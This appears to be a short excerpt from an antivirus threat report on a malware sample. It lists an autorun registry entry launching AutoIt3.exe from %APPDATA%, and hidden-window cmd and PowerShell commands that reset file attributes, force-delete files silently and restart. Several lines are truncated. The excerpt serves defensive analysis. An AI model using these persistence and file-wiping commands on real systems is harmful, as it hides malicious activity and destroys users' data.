Technical Information
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Local' = '"%APPDATA%\Microsoft\AutoIt3.exe" "%APPDATA%\Microsoft\Local"'
- '<SYSTEM32>\cmd.exe' /C ECHO/GCI "<Current directory>" -Force ^^^| foreach {$_.Attributes = [System.IO.FileAttributes]::Normal};RI -Path "<Full path to file>" -Force -ErrorAction SilentlyContinue;sleep 30 ; Restart...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C ECHO/GCI "<Current directory>" -Force ^^^| foreach {$_.Attributes = [System.IO.FileAttributes]::Normal};RI -Path "<Full path to file>" -Force -ErrorAction SilentlyContinue;sleep 30 ; Restart...
- '<SYSTEM32>\cmd.exe' /S /D /c" ECHO/GCI "<Current directory>" -Force ^| foreach {$_.Attributes = [System.IO.FileAttributes]::Normal};RI -Path "<Full path to file>" -Force -ErrorAction SilentlyContinue;sleep 30 ; Re...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -